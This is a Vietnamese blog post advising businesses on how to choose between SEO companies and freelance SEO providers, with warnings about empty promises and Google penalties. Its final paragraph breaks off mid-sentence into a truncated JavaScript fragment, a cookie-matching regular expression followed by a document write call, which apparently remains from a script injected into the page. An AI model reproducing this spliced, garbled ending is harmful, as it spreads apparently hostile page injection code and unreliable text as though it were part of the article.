Nhận làm SEO?

Thời gian gần đây, mình thấy một xu thế chung là người người làm SEO, nhà nhà làm SEO, Doanh nghiệp nào cũng muốn SEO. Có lẽ do tình trạng kinh tế khó khăn chung nên để marketing hiệu quả và giảm chi phí nên SEO trở thành phương pháp Marketing số một. Từ đó cũng xuất hiện nhiều đối tượng nhận làm SEO ?

nhận làm seo

Doanh nghiệp nhận làm SEO?

– Các doanh nghiệp nhận làm SEO cũng có 5 bảy loại nhưng tựu chung đều muốn chứng minh với khách hàng về khả năng làm dịch vụ seo chuyên nghiệp của mình. Nhiều khách hàng chưa hiểu về SEO được họ chia sẻ những lời có cánh ngọt ngào và chót kí vào hợp đồng SEO mà không nhìn nhận năng lực thực sự của họ rồi để xảy ra tình trạng tiền mất tật mang. Web có nguy cơ vào Sandbox của google, tiền thì không đòi lại được!

– Để đánh giá chinh xác năng lực của một công ty SEO nào đó, bạn hãy nhìn vào website của họ, thử search một vài từ khóa như dịch vụ seo xem họ đang ở vị trí thứ mấy, từ đó bạn sẽ thấy năng lực của họ, vì trong ngành SEO, cạnh tranh giữa các công ty vô cùng tàn khốc, nhất là trên môi trường internet, chính họ phải SEO website của mình lên top để tiếp cận nhiều khách hàng hơn, không có chuyện một doanh nghiệp nhận làm SEO chuyên nghiệp mà website lại chẳng vào được top 10 google với các từ khóa chính của ngành SEO.

– Theo dõi tiến độ SEO các doanh nghiệp khi họ nhận làm SEO, các dịch vụ chuyên nghiệp thường cung cấp các báo cáo tiến độ SEO thường kì cho khách hàng để bạn nắm vững tính hình. Khi có sự suy giảm thứ hạng từ khóa từ báo cáo hãy kiểm tra lại bằng tay và tìm kiếm nguyên nhân sụt giảm. Các nguyên nhân có thể do biến đổi thuật toán Google, do sự khúc mắc khi trao đổi giữa bạn và doanh nghiệp nhận làm SEO  (mỗi người đưa nội dung một kiểu lên website ….).

Cá nhân nhận làm SEO?

– Các cá nhân có thể làm SEO thì đông vô số kể, nhưng có trình độ cao thì lại không nhiều, một số qua các trường đào tạo, đã từng làm các dự án lớn nhưng họ chưa chắc đã theo kịp sự biến đổi thuật toán của Google.

– Cá nhân làm SEO thường lấy giá rất rẻ, nhưng họ không có một hợp đồng đảm bảo nào, đúng tiến độ thì không sao nhưng khi có sự thay đổi trong thuật toán của google, hoặc bị đối thủ sử dụng một số thủ đoạn để làm giảm thứ hạng của website, thì rất khó khôi phục vì họ không có qui trình SEO chuẩn. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘

Từ khóa: